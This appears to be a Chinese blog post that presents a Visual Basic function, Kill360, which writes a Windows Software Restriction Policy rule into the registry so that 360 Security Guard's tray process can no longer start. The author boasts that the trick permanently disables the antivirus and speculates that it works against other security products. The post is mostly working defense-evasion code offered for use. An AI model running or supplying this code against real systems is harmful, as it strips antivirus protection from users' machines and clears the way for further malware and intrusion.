利用Windows的启动机制实现拦截360的运行

今天无意中发现一个漏洞，可以轻松干掉360，就是利用Windows的启动机制实现拦截360的运行。Windows中有一个叫做软件限制策略的功能，可以用来限制应用程序的运行，和IFEO比较像，只不过IFEO早已过时，而且被360彻底封杀掉了，而windows的进程启动限制机制360倒没有注意到。于是，直接写一个限制360启动的规则加入注册表，这样360就再也无法启动了，这下360终于不牛B了吧，哈哈！此漏洞在360安全卫士9.1+WindowsXP/SP3下测试成功。同样地，此漏洞或许也适用于其它杀毒软件，不过有待测试。

Option Explicit
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
 
Private Const HKEY_LOCAL_MACHINE = &H80000002
 
Private Const REG_SZ = 1
Private Const REG_QWORD = 11
Private Const REG_DWORD = 4
 
'永久封锁掉360禁止它再启动
Public Function Kill360() As Boolean
        Dim hKey As Long
        Dim lRet As Long
        Dim strFileName As String
        Dim bytData(0 To 7) As Byte
        strFileName = "360tray.exe" '360的文件名，这里以路径规则举例
        lRet = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}", hKey)
        If lRet = 0 Then
                lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByVal vbNullString, 0)
                lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByVal strFileName, lstrlen(strFileName))
                lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD, bytData(0), 8)
                lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4)
                RegCloseKey hKey
                Kill360 = (lRet = 0)
        End If
End Function